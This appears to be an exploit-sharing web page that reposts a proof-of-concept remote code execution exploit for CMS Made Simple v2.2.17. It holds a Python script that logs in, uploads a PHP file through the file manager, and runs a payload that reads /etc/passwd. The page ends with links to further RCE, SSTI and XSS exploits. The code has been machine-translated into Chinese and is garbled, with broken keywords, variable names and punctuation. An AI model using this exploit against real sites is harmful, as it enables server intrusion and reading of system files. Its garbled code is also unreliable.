cmsmadesimple v2.2.17-远程代码执行（RCE）

HackApt-37 Team · 04 9, 2025

#Exploit title: cmsmadessimple v2.2.17-远程代码执行（RCE）
＃application: cmsmadesimple
＃版本: v2.2.17
＃bugs:远程代码执行（RCE）
＃Technology: PHP
#DENDOR URL: https://www.cmsmadesimple.org/
#software link: https://www.cmsmadesimple.org/downloads/cmsms
#date of uth: 12-07-2023
＃作者:MirabbasAğalarov
#Tested On: Linux
导入请求
login_url='http://localhost/admin/login.php'
用户名=输入（'用户名='）
密码=输入（'密码='）
upload_url='http://localhost/admin/moduleinterface.php'
file_path=input（'请phar文件名，但文件必须与python文件和文件内容

hp echo echo系统（'cat /etc /passwd'）？'）相同的目录？
#phar文件内容''''？php echo系统（'cat /etc /passwd'）？''''''
login_data={
'username':用户名，
'password':密码，
'loginsubmit':'提交'
}
session=requests.session（）
响应=session.post（login_url，data=login_data）
if antsphy.status_code==200:
打印（“登录帐户”）
其他:
打印（'登录PREMLEM。'）
出口（）
文件={
'm1_files []':打开（file_path，'rb'）
}
数据={
'MACT':'FILEMANAGER，M1_，上传，0'，
'c': session.cookies [' c']，
'disable_buffer':'1'
}
响应=session.post（upload_url，files=files，data=data）
if antsphy.status_code==200:
打印（“文件上传”）
rce_url=f'http://localhost/uploads/{file_path}'
rce=requests.get（rce_url）
打印（rce.text）
其他:
打印（“文件不上传”）

	Viessmann Vitogate 300 2.1.3.0——远程代码执行 (RCE) Root #Hack7er1949 01 21, 2025 POC/?Day
H	CMSMADESIMPLE v2.2.17-通过服务器端模板注入（SSTI）劫持会话 HackApt-37 Team 04 9, 2025 POC/?Day
H	cmsmadesimple v2.2.17-存储的跨站点脚本（XSS） HackApt-37 Team 04 9, 2025 POC/?Day
	POC pgAdmin 8.4 远程代码执行漏洞 Root #Hack7er1949 09 11, 2024 POC/?Day
	POC Apache Tapestry远程代码执行漏洞 Shacker 09 13, 2024 POC/?Day